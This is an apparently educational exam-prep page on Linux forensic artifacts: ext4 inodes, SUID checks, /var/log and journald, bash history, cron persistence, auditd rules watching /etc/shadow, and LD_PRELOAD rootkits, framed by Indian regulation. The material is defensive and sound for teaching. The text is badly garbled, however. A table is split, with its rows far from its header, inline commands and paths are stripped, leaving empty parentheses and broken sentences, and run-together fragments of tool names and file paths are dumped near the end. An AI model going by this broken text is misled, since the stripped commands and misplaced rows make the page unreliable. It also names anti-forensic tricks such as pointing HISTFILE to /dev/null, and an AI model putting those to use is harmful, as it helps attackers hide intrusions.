Linux Forensic Artifacts: File System, Logs, Cron and Shell History
ext4, /var/log, auditd, journalctl, bash history, cron persistence, SUID, SELinux and plaso timelining for Indian digital forensic examiners working Linux servers.
Practice with national-level exam (FACT, FACT Plus, NET, CUET, etc.) mocks, learn from structured notes, and get your doubts solved in one place.
ext4, /var/log, auditd, journalctl, bash history, cron persistence, SUID, SELinux and plaso timelining for Indian digital forensic examiners working Linux servers.
The interesting Indian digital forensic cases stop being Windows the moment they touch a server. Web hosting providers, payment gateways, government departments, and most of the cloud workloads CERT-In sees in its incident pipeline are Linux. A forensic examiner who can read an ext4 inode, parse auth.log, pull a deleted bash history from journal binary logs, and spot a cron entry that adds a user every Tuesday at 03:00 IST is the examiner the case actually needs. The Windows artifact playbook does not translate. Linux puts its trail in plain-text files (mostly), in binary journal databases (increasingly), and in places like /proc and /sys that exist only while the system is running.
This topic walks the file-system-to-userspace stack a Linux forensic examiner reads, in the order they typically read it. The framing throughout is Indian, with CERT-In's mandatory log retention regime under the 28 April 2022 directions, the IT Act 2000 read with BSA 2023 Section 63 for admissibility, and the working assumption that the target system is a Debian, Ubuntu, RHEL or CentOS server. macOS sits next to Linux on the BSD branch of the family tree; the macOS plist, Keychain and Time Machine topic is the natural follow-up. For the persistence-and-removal half of the same stack, see data recovery and file carving.
If you can read an inode, you can read the rest of the system.
Linux servers in Indian production are overwhelmingly ext4, with XFS dominant on RHEL-family RAID arrays, Btrfs visible on SUSE and on some Synology NAS evidence, and ZFS on FreeNAS-derived storage appliances. Each file system answers the same examiner questions differently: where do MAC times live, how is the journal organised, what happens at deletion, and what survives.
ext4 keeps file metadata in inodes. An inode carries the permissions (mode bits), the owning UID and GID, the file size, the link count, four timestamps (atime, mtime, ctime and crtime since ext4), and an extent tree that locates the file's data blocks on disk. The file name does not live in the inode. It lives in the parent directory entry, which is an array of (inode_number, name) pairs. The practical consequence: when a file is deleted on ext4, the directory entry's inode number is typically zeroed (or the entry is marked unused), but the inode itself often survives with its block pointers cleared. The data blocks themselves are unmodified until reallocated.
The ext4 journal (the jbd2 log) records metadata changes in /dev/sdX1's reserved journal area. The journal is a circular buffer; for a busy server it cycles in minutes. For a quiet workstation, hours of journal history can survive. Tools like extundelete and ext4magic parse the journal to recover recently deleted files even after the inode is cleared, because the journal carries the pre-deletion inode state.
| File system | Inode timestamps | Journal | Deletion behaviour |
|---|---|---|---|
| ext2 | atime, mtime, ctime (second precision) | None | Inode block pointers preserved until reallocated; deleted files highly recoverable. |
The bits that separate a normal binary from a backdoor.
POSIX permissions on Linux are three triplets: owner, group, others, each with read, write and execute. The numeric form (chmod 755) and the symbolic form (rwxr-xr-x) are the same thing. The examiner cares about three extra bits beyond the basics.
/tmp is the canonical example.A baseline Linux system has a known set of SUID binaries (/bin/su, /bin/sudo, /usr/bin/passwd, /usr/bin/chsh, a handful more). Any SUID binary outside that baseline, especially one owned by root with mode 4755, is a finding. The textbook detection is find / -perm -4000 -type f 2>/dev/null for SUID and -perm -2000 for SGID. The 2024 incident response at an Indian PSU's procurement portal turned on a single line in the find output: /usr/local/lib/libcrypt-cache.so.1 set SUID root, masquerading as a libc helper, was the dropper's installed persistence.
ACLs extend POSIX with per-user and per-group entries beyond the owner-group-others triplet. getfacl /path/to/file reads them; setfacl writes them. ACLs are not visible in a normal ls -l (the trailing + is the only hint), so a file with an unexpected ACL is easy to miss in a hurried audit.
SELinux and AppArmor are the Mandatory Access Control frameworks. SELinux is RHEL/CentOS default and labels every file with a user:role:type:level context (ls -Z to view). AppArmor is Debian/Ubuntu default and uses per-binary profiles in /etc/apparmor.d/. A forensic finding: a process running with an unexpected SELinux context, or an AppArmor profile that has been silently disabled (aa-status), is a tampering indicator.
Hidden files on Linux are just files whose names start with a dot. ls skips them; ls -la shows them. The convention is older than the file system itself. Attackers exploit it heavily, especially in user home directories () and in (note the trailing space) and style names that survive routine cleanups.
What auth.log, syslog, wtmp and journald between them know.
The Indian server-side forensic workflow lives in /var/log/. Different distributions split it differently, but the artifact families are stable.
/var/log/auth.log on Debian and Ubuntu, /var/log/secure on RHEL and CentOS. Authentication events: ssh logins (successful and failed), sudo invocations, su, pam events. This is the first file the examiner reads./var/log/syslog on Debian/Ubuntu, /var/log/messages on RHEL/CentOS. General system events that the kernel and daemons emit. Drivers loading, mounts happening, services starting and stopping./var/log/wtmp: binary database of successful login and logout events. Read with last. Records the username, terminal, source IP (for remote logins), and the duration of the session./var/log/btmp: binary database of failed login attempts. Read with lastb. The Indian web hosting reality is that lastb on any internet-facing server shows tens of thousands of ssh brute-force attempts; the signal is in the source IP geography and timing patterns./var/log/lastlog: binary database of the single most recent login per user. Read with lastlog. Useful for "when did root last log in directly" questions./var/log/kern.log or kernel events inside /var/log/messages: OOM kills, hardware errors, USB plug events./var/log/audit/audit.log if auditd is running: rule-driven kernel-level audit records./var/log/journal/<machine-id>/system.journal: the systemd-journald binary database, on modern distributions the canonical location for everything except the legacy text files above.Two artifacts attackers tamper with first.
Shell history is the file the attacker tries to wipe. ~/.bash_history is the default for bash; ~/.zsh_history for zsh. The environment variables that govern them are worth memorising:
HISTSIZE: maximum number of commands kept in memory for the current session.HISTFILESIZE: maximum number of commands kept in the history file on disk.HISTFILE: the file path. Setting it to /dev/null is the classic anti-forensic trick.HISTTIMEFORMAT: when set, prefixes each history entry with a timestamp. When unset, history entries are bare commands with no time information.The forensic reality on Indian production servers is that HISTTIMEFORMAT is usually unset, which means the bash history is a flat list of commands with no times attached. Examiners deal with this in three ways. First, cross-reference against /var/log/auth.log to bracket the user's session windows: a command in the history at position 47 is between the login at 14:02 and the logout at 14:55. Second, look for .bash_history.<timestamp> rotated files left behind by misconfigured rotation. Third, parse the systemd journal for _COMM=bash and _COMM=sudo entries, which carry timestamps even when bash history does not.
Cron is the persistence vector. Linux cron has more places to hide than examiners typically check.
The kernel-side audit and the userspace-side hiding tricks.
auditd is the Linux Audit Daemon. It runs as a userspace process that hooks into the kernel audit subsystem and writes records to /var/log/audit/audit.log. Rules live in /etc/audit/audit.rules. A baseline production rule set typically watches /etc/passwd, /etc/shadow, /etc/sudoers, the cron drop directories, and execve syscalls by privileged users.
-w /etc/passwd -p wa -k identity
-w /etc/shadow -p wa -k identity
-w /etc/sudoers -p wa -k privilege
-a always,exit -F arch=b64 -S execve -F euid=0 -k root-exec
ausearch -k identity --start "2026-05-10 00:00:00" queries records matching the identity rule key. aureport --summary produces a high-level summary across the log. The Indian CERT-In log retention directions of 28 April 2022 effectively require Indian VPS and data-centre operators to keep audit and authentication logs for 180 days; this is the regulation that turned auditd from a nice-to-have into a deployed-everywhere baseline on Indian-hosted Linux servers.
Temp directories are forensic-significant for two reasons. /tmp and /var/tmp are world-writable, and attackers use them as staging areas. The difference: /tmp is cleared on reboot on most distributions (via systemd-tmpfiles); /var/tmp persists across reboots. A payload dropped in /var/tmp survives a reboot and is easier to spot post-incident than one in /tmp that has been swept.
/etc/fstab lists every persistent mount. The mount command shows what is mounted now. A mismatch between the two is a finding: a device that is mounted but not in fstab was mounted by hand, possibly by an attacker; a device in fstab but not mounted may have been removed. readlink -f resolves symbolic links to their target; chains of symbolic links in user home directories or /usr/local/ are a hiding pattern.
Linux-specific malware artifacts cluster around two techniques. First, kernel-mode rootkits (loadable kernel modules under /lib/modules/<kernel>/) hide files, processes and network sockets by hooking syscalls. Detection: lsmod against a known-clean baseline, for module metadata, and offline disk-image scans because a running rootkit can lie to live tooling. Second, user-space hooking, where a shared library named in or in the environment variable is injected into every dynamically linked process; the library intercepts , , and friends. Detection: against a known-clean binary, comparison of against (different syscall patterns; a hook that fools one may not fool the other), and tools like and that look for the common signatures.
The integrated workflow for an SFSL Linux case.
The artifact-by-artifact reading is for the textbook. The casework reading is integrated. Three tool families do the heavy lifting on an Indian SFSL Linux investigation.
Sleuth Kit and Autopsy. Sleuth Kit's command-line tools (mmls, fls, icat, istat, blkls, tsk_recover) parse the on-disk image without mounting it, which is the right move for evidence integrity. mmls image.dd lists partitions; fls -r -m / image.dd offset=... walks the file system and emits a bodyfile suitable for timelining; icat image.dd <inode> extracts a file by inode number. Autopsy is the GUI layer that wraps the same tooling and adds keyword search, hash lookup, and report generation. Indian academic labs at NFSU Gandhinagar and at LNJN NICFS Delhi teach Autopsy as the default GUI.
log2timeline / plaso. Plaso ingests every supported artifact format from a mounted image or a directory and writes a .plaso storage file. psort.py renders the storage file to CSV, Elasticsearch, or any other supported sink. The output is the super-timeline: one row per event, sortable by time, joinable against any other CSV. For a Linux server image, plaso pulls bash history, syslog, auth.log, wtmp, journald binaries, auditd records, cron drops, and file system MAC times into a single timeline. The CSM-side analogue is the chain of custody workflow that wraps the analytical result; the digital chain begins at imaging and ends at the BSA 2023 Section 63 certificate.
Mac-robber. A small but useful tool that walks a mounted file system and emits a bodyfile for mactime. Faster than fls when the image is already mounted read-only for triage. Often used as the first-pass timelining step.
The Indian context that frames all of this. Linux dominates the server side of the Indian internet: BSNL infrastructure, payment-gateway endpoints, NIC-hosted government portals, the bulk of cloud workloads in AWS Mumbai, Azure Pune and GCP Delhi regions. CERT-In's 28 April 2022 directions require data-centre and VPS providers to maintain ICT system logs for 180 days, with mandatory incident reporting within six hours of detection. The effect of this regulation on forensic practice is direct: the auth.log, journald and auditd records the examiner expects to find usually exist for the relevant time window, and the absence of them is itself a finding (and a CERT-In compliance breach by the operator). The case files coming out of the I4C (Indian Cybercrime Coordination Centre) pipeline routinely include exports and journald files as evidence annexures, certified under BSA 2023 Section 63.
On an ext4 file system, which structure carries a file's permissions, MAC times, link count and block pointers?
| ext3 | atime, mtime, ctime (second precision) | Optional metadata journal (jbd) | Inode block pointers preserved; journal helps recover recent deletes. |
| ext4 | atime, mtime, ctime, crtime (nanosecond) | jbd2 metadata journal, optional data journal | Inode block pointers zeroed on delete; extundelete and ext4magic parse journal. |
| XFS | atime, mtime, ctime (no birth time field by default) | Internal log section | Aggressive delayed allocation; deletion recovery harder, xfs_undelete project. |
| Btrfs | atime, mtime, ctime, otime | Copy-on-write, no traditional journal | Snapshots are the primary recovery surface; btrfs-find-root for catastrophic loss. |
/proc and /sys are not file systems in the on-disk sense. They are virtual interfaces to kernel state. /proc/<pid>/ exposes per-process state (cmdline, exe symlink, fd descriptors, maps, environ); /sys/class/ exposes device-driver state. Neither survives a reboot, but on a live system both are gold. The examiner who can read /proc/<pid>/maps for a suspicious PID gets a list of every memory-mapped library and file the process has open, which is often the fastest route to identifying an unfamiliar payload.
~/.cache/.config-backup//tmp/. //var/tmp/.../var/log/btmpsystemd-journald is the framework that ate most of the rest. The journal database under /var/log/journal/<machine-id>/ is binary, indexed, and queryable with rich filters. journalctl --since "2026-05-10 00:00" --until "2026-05-12 23:59" slices by time. journalctl _SYSTEMD_UNIT=sshd.service filters by service. journalctl -k gives kernel ring buffer entries. journalctl _UID=1001 gives every entry attributed to a specific user. The forensic examiner extracts the binary journal directly from the image and runs journalctl --file /path/to/system.journal on the analysis host.
A real Indian incident in 2024 at a media-streaming startup turned on a cron entry in /var/spool/cron/crontabs/www-data that exfiltrated /etc/passwd and /etc/shadow to an attacker-controlled host every six hours. The system crontab had been audited and was clean; the per-user crontab for the www-data web user had been overlooked by the in-house team. CERT-In's post-incident note (CIAD-2024-0144) flagged the per-user crontab location as a recurring blind spot.
kmod listLD_PRELOAD/etc/ld.so.preloadLD_PRELOADreaddiropenconnectstracelsfindrkhunterchkrootkitauditd.journal